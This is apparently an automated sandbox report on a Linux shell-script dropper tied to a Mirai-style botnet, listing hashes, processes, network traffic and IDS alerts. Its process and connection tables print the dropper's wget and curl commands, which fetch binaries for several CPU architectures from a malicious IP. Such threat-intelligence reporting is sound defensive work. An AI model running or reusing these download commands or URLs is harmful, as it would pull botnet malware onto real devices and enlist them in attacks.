File name: | 8UsA.sh |
Full analysis: | https://app.any.run/tasks/b015273a-0a89-4f85-b8ea-baeb6392eb0d |
Verdict: | Malicious activity |
Threats: | A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. |
Analysis date: | January 10, 2025, 19:11:04 |
OS: | Ubuntu 22.04.2 LTS |
Tags: | |
Indicators: | |
MIME: | text/x-shellscript |
File info: | Bourne-Again shell script, ASCII text executable |
MD5: | 17BED510A00FCABA1DFAD2DE86D3F0AC |
SHA1: | BD93C9B1642D9291731933387F1D751C85C6D323 |
SHA256: | 7A091CE1DFCCDFFF5DB4938EBD85A0A088B255A1DDC0BAE4431E160316EF8995 |
SSDEEP: | 24:vUQFsx4BPhzuJ/KWAssYAYLhlAdksqAksxtATFEIhPAPS:viqP2/KVssHYLYdJBkutATfI6 |
.sh | | | Linux/UNIX shell script (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
38760 | /bin/sh -c "sudo chown user /home/user/Desktop/8UsA\.sh && chmod +x /home/user/Desktop/8UsA\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/8UsA\.sh " | /usr/bin/dash | — | any-guest-agent |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38761 | sudo chown user /home/user/Desktop/8UsA.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38762 | chown user /home/user/Desktop/8UsA.sh | /usr/bin/chown | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38763 | chmod +x /home/user/Desktop/8UsA.sh | /usr/bin/chmod | — | dash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38764 | sudo -iu user /home/user/Desktop/8UsA.sh | /usr/bin/sudo | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38765 | /bin/bash /home/user/Desktop/8UsA.sh | /usr/bin/bash | — | sudo |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38766 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38767 | wget http://141.98.10.115/bins/UnHAnaAW.x86 | /usr/bin/wget | bash | |
User: user Integrity Level: UNKNOWN Exit code: 0 | ||||
38768 | systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service | /usr/bin/systemctl | — | snapd |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
38769 | curl -O http://141.98.10.115/bins/UnHAnaAW.x86 | /snap/snapd/20290/usr/bin/snap | — | bash |
User: user Integrity Level: UNKNOWN Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
38767 | wget | /tmp/UnHAnaAW.x86 | o | |
MD5:— | SHA256:— | |||
38813 | wget | /tmp/UnHAnaAW.mips | binary | |
MD5:— | SHA256:— | |||
38859 | wget | /tmp/UnHAnaAW.mpsl | o | |
MD5:— | SHA256:— | |||
38975 | wget | /tmp/UnHAnaAW.arm6 | binary | |
MD5:— | SHA256:— | |||
39016 | wget | /tmp/UnHAnaAW.arm7 | o | |
MD5:— | SHA256:— | |||
39052 | wget | /tmp/UnHAnaAW.ppc | binary | |
MD5:— | SHA256:— | |||
39095 | wget | /tmp/UnHAnaAW.m68k | binary | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | — | 169.150.255.184:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | — | — | — |
— | — | GET | — | 195.181.175.41:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | — | — | — |
— | — | GET | — | 207.211.211.26:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | — | — | — |
— | — | GET | 204 | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
38767 | wget | GET | 200 | 141.98.10.115:80 | http://141.98.10.115/bins/UnHAnaAW.x86 | unknown | — | — | malicious |
— | — | GET | — | 91.189.91.97:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | — | 91.189.91.97:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
— | — | GET | 200 | 141.98.10.115:80 | http://141.98.10.115/bins/UnHAnaAW.x86 | unknown | — | — | malicious |
38939 | wget | GET | 200 | 141.98.10.115:80 | http://141.98.10.115/bins/UnHAnaAW.arm5 | unknown | — | — | malicious |
38905 | curl | GET | 404 | 141.98.10.115:80 | http://141.98.10.115/bins/UnHAnaAW.arm4 | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 91.189.91.97:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted |
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 91.189.91.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted |
— | — | 212.102.56.178:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted |
— | — | 169.150.255.180:443 | odrs.gnome.org | — | GB | whitelisted |
— | — | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
38767 | wget | 141.98.10.115:80 | — | UAB Host Baltic | LT | malicious |
— | — | 141.98.10.115:80 | — | UAB Host Baltic | LT | malicious |
38813 | wget | 141.98.10.115:80 | — | UAB Host Baltic | LT | malicious |
38812 | 3AvA | 141.98.10.115:1024 | — | UAB Host Baltic | LT | malicious |
Domain | IP | Reputation |
---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
api.snapcraft.io |
| whitelisted |
google.com |
| whitelisted |
43.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address |
— | — | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86 |
— | — | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
— | — | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address |
— | — | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad |
— | — | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86 |
— | — | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |
— | — | A Network Trojan was detected | AV INFO Possible Mirai .mips Executable Download |
— | — | Potentially Bad Traffic | ET INFO MIPS File Download Request from IP Address |
— | — | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP |